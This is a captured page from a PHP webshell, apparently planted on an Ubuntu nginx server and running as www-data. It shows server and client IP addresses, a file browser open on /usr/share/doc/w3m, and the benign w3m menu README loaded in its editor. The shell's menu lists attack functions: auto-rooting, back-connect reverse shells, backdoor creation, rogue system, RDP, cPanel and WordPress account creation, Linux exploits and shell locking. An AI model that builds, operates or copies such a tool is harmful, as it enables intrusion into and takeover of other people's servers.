Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
w3m /
[ HOME SHELL ]
Name
Size
Permission
Action
de
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
ja
[ DIR ]
drwxr-xr-x
FAQ.html
15.63
KB
-rw-r--r--
HISTORY.gz
20.42
KB
-rw-r--r--
MANUAL.html
37.92
KB
-rw-r--r--
NEWS.gz
5.47
KB
-rw-r--r--
README
3.03
KB
-rw-r--r--
README.SSL
2.11
KB
-rw-r--r--
README.cookie
2.7
KB
-rw-r--r--
README.dict
1.75
KB
-rw-r--r--
README.func
5.64
KB
-rw-r--r--
README.keymap
1.28
KB
-rw-r--r--
README.m17n.gz
4.79
KB
-rw-r--r--
README.menu
3.26
KB
-rw-r--r--
README.mouse
1.33
KB
-rw-r--r--
README.passwd
760
B
-rw-r--r--
README.pre_form
1.48
KB
-rw-r--r--
README.siteconf
2.05
KB
-rw-r--r--
README.sixel
836
B
-rw-r--r--
README.tab
1.42
KB
-rw-r--r--
STORY.html
9.29
KB
-rw-r--r--
changelog.Debian.gz
2.18
KB
-rw-r--r--
copyright
11.98
KB
-rw-r--r--
keymap.default
2.55
KB
-rw-r--r--
keymap.lynx
2.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.menu
w3m menu options (2002/11/27) H. Sakamoto hsaka@mth.biglobe.ne.jp [1] Hotkeys * General Purpose HELP, INS key : open menu HELP, INS key, C-c, : close menu RET(C-m, C-j), SPC, right-key : select BS(C-h), DEL(C-?), left-key : go back C-n, j, down-key : go to lower selection C-p, k, up-key : go to upper selection J : scroll down K : scroll up C-a : previous heading C-e : next heading C-f, C-v : next page C-b, M-v : last page C-s, / : search down C-r, ? : search up n : search for next N : search for previous C-z : suspend # INS is normally ^[[2~ but is bound to ^[[L(console), ^[[E(PocketBSD). MenuKeymap, MenuEscKeymap, MenuEscBKeymap, MenuEscDKeymap are defined in (menu.c) * Special Case MenuItem structure (menu.h) is set as (possibly multiple) char * keys from the keys listed above. [2] Mouse Button 3: open menu After opening the menu button 1/3 (heading) : select button 1/3 (frame, MENU_NOP) : nothing button 1/3 (outside menu) : go back (close menu) button 1/3 ( : ) : next page or prev page heading (in case of long menu) button 1/3 (drag) : scroll [3] menu customization menu is defined in ~/.w3m/menu menu is menu MENU_ID heading : end For settings, every heading is func LABEL FUNCTION KEYS [DATA] //command execution popup LABEL MENU_ID KEYS //open sub-menu nop LABEL //no action (separator or title) are possible settings. Look at menu.defualt and menu.submenu for examples. Look at README.func for setting commands (FUNCTION). For MENU_ID "Main" is the main menu, "Select" is buffer choice menu, "SelectTab" is the tab selection menu. For KEYS, the key to be bound to the menu. For DATA, set the command (FUNCTION) arguments. [4] Development See Below to understand menu routines such as mainMenu(), optionMenu() etc. The MenuItem routine structure is defined below, almost all menus are constructed like this. MenuItem 構造体 (menu.h) struct { int type; /* type */ char *label; /* label */ int *variable; /* VALUE_MENU variable settings */ int value; /* VALUE_MENU variable value */ void (*func)(); /* function choice */ struct _Menu *popup; /* submenu */ char *keys; /* bound keys */ } MenuItem; Type "type" used below. MENU_NOP (1) : No action, no setting. (title and separator) MENU_FUNC (2) : function execution MENU_VALUE (4) : (*variable) and (value) setting MENU_POPUP (8) : submenu to open MENU_FUNC and MENU_VALUE are (MENU_FUNC | MENU_VALUE) and need to be set together。(variable needs to be set) Example of MainMenuItem and new_option_menu() can be seen in (menu.c).
Close